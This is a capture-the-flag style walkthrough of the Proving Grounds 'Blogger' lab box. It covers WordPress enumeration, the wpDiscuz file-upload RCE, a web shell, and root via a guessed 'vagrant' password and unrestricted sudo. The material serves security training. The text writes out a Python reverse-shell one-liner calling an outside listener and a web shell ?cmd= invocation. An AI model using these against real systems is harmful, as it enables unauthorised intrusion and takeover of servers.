PG - Blogger

PG – Blogger

In this walk through, we will be going through the Blogger room from Proving Grounds. This room is rated as Easy on the platform and it consists of WordPress Plugins Enumeration and exploitation to get initial access and for the privilege escalation, some password guessing and misconfigured sudo permissions exploitation is required to get root on the server. So, let’s get started without any delay.

Blogger

Machine Info:

TitleBlogger
IPaddress192.168.224.217
DifficultyEasy
OSLinux
DescriptionBlogger is an easy machine which requires WordPress Plugins Enumeration and exploitation to get initial access and then with the help of some password guessing and misconfigured sudo permissions get root on the server.

Enumeration:

  • I started off with a regular nmap scan with service version detection flag enabled and found two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -sS -sV 192.168.224.217
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 13:36 IST

Nmap scan report for 192.168.224.217
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.61 seconds

nmap scan

Enumerating Port 80 (HTTP)

  • Enumerated the web server on port 80 and found a static portfolio website running.

Blogger website

  • There is a login button in the site’s menu. Registered as a user however it didn’t find any way to log in further.

Login panel

Register

  • Next, fired gobuster on the target to reveal some hidden directories. Found a couple of them. However, the interesting one was the /assets directory.

$ gobuster dir -u http://192.168.224.217/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.224.217/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/11 13:47:49 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 319] [--> http://192.168.224.217/images/]
/js                   (Status: 301) [Size: 315] [--> http://192.168.224.217/js/]    
/css                  (Status: 301) [Size: 316] [--> http://192.168.224.217/css/]   
/assets               (Status: 301) [Size: 319] [--> http://192.168.224.217/assets/]
/server-status        (Status: 403) [Size: 280]                                     
                                                                                    
===============================================================
2024/01/11 13:54:45 Finished

gobuster scan

  • Enumerated the content of the directory further and found a “blog” sub-directory in the fonts section.

Index of /assets

Index of /assets/fonts

  • The blog directory posts are redirecting to particular domain – blogger.thm. So, added it to my /etc/hosts file and accessed the website. The running Blog website found to be running WordPress CMS.

Blogger posts

blogger.thm

Blogger Latest posts

Enumerating WordPress CMS

  • Moving on, used wpscan to enumerate further the WordPress installation. I initially looked for all plugins, all themes and the available users.

$ wpscan --url http://blogger.thm/assets/fonts/blog/ -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://blogger.thm/assets/fonts/blog/ [192.168.224.217]
[+] Started: Thu Jan 11 14:21:42 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blogger.thm/assets/fonts/blog/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blogger.thm/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blogger.thm/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blogger.thm/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/?feed=rss2, <generator>https://wordpress.org/?v=4.9.8</generator>
 |  - http://blogger.thm/assets/fonts/blog/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.9.8</generator>

[+] WordPress theme in use: poseidon
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/
 | Last Updated: 2022-10-20T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt
 | [!] The version is out of date, the latest version is 2.3.9
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1
 | Style Name: Poseidon
 | Style URI: https://themezee.com/themes/poseidon/
 | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The...
 | Author: ThemeZee
 | Author URI: https://themezee.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1, Match: 'Version: 2.1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:20:51 <==========================================================================================================> (26636 / 26636) 100.00% Time: 00:20:51
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] poseidon
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/
 | Last Updated: 2022-10-20T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt
 | [!] The version is out of date, the latest version is 2.3.9
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css
 | Style Name: Poseidon
 | Style URI: https://themezee.com/themes/poseidon/
 | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The...
 | Author: ThemeZee
 | Author URI: https://themezee.com
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/, status: 500
 |
 | Version: 2.1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css, Match: 'Version: 2.1.1'

[+] twentyfifteen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.6
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 2.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 2.0'

[+] twentyseventeen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.7'

[+] twentysixteen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.5'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] j@m3s
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jm3s
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jan 11 14:42:55 2024
[+] Requests Done: 26708
[+] Cached Requests: 14
[+] Data Sent: 7.691 MB
[+] Data Received: 4.265 MB
[+] Memory used: 323.953 MB
[+] Elapsed time: 00:21:12

wpscan scan

wpscan scan

wpscan scan

wpscan scan

Users Identified

  • I was able to find enough information from the previous scan but was unable to find any known exploits with respect to it, to get the initial access. Also tried to bruteforce the WordPress admin panel with the found usernames and common password wordlist but found no luck. So, re-enumerate the plugins but this time more aggressively.

wpscan --url http://blogger.thm/assets/fonts/blog/ --plugins-detection aggressive -e ap

Plugin Identified

Initial Access:

  • Found two more plugins – wpDiscuz and akismet. Upon checking for any known exploits for both the plugins. Found an Unauthenticated Arbitrary File Upload vulnerability (2020-24186) which is then can be escalated to Remote Code Execution.

Wordpress Plugin wpDiscuz 7.0.4 RCE

  • I used the below exploit but it failed to grant me shell. As per the output, the shell was successfully uploaded to the server however the exploit was unable to execute it further.

python3 49967.py -u http://blogger.thm/assets/fonts/blog/ -p /?p=29

firing exploit

  • I checked the directory where the shell was stored and then manually added the “?cmd” parameter after it as per the exploit which then gives me output according to the input command.

Uploads directory

http://blogger.thm/assets/fonts/blog/wp-content/uploads/2024/01/djnxvscwscmaadr-1705075469.8528.php?cmd=whoami

got access via web shell

  • Let’s upgrade our shell access by executing the below reverse shell payload using our web shell and catching the response with our netcat listener.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

got initial access

  • Checked the wp-config file and found the mysql username and password. Enumerated further with it but found nothing interesting.

cat wp-config.php

cat wp-config.php

  • Captured the local.txt flag in user james directory.

local flag

Privilege Escalation:

  • Next, uploaded and executed Linpeas on the target. It reveals a cron job that is being executed by the root.

cronjobs

  • Performed further enumeration on the backup.sh file revealed that we are unable to make changes to the file and the file is creating a backup to james’s home directory. I tried to perform path hijacking attack on tar binary as it was not using the absolute path but it failed.

ls -l /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh

backup.sh

  • After a lot of banging of my head, i found out that we can upgrade our shell to user vagrant with his password “vagrant”. Now this was purely a guess-work here and requires no special enumeration.

su vagrant
vagrant

su vagrant

  • Checked the sudo permissions for the user and found out that it can execute any commands without any password.

sudo -l

sudo -l

  • With the equipped permissions, changed user to root and captured the root flag.

sudo su

proof flag

Also Read: PG – AuthBy

Conclusion:

Conclusion

So that was Bloggerfor you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Found out that the web server is running a WordPress installation. Found out that wordpress plugin wpDiscuz is vulnerable to RCE. Used it to get initial access on the target. Next, with some password guessing found out that we can switch our user shell to vagrant with password “vagrant”. Post that, just used ALL sudo privilege to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top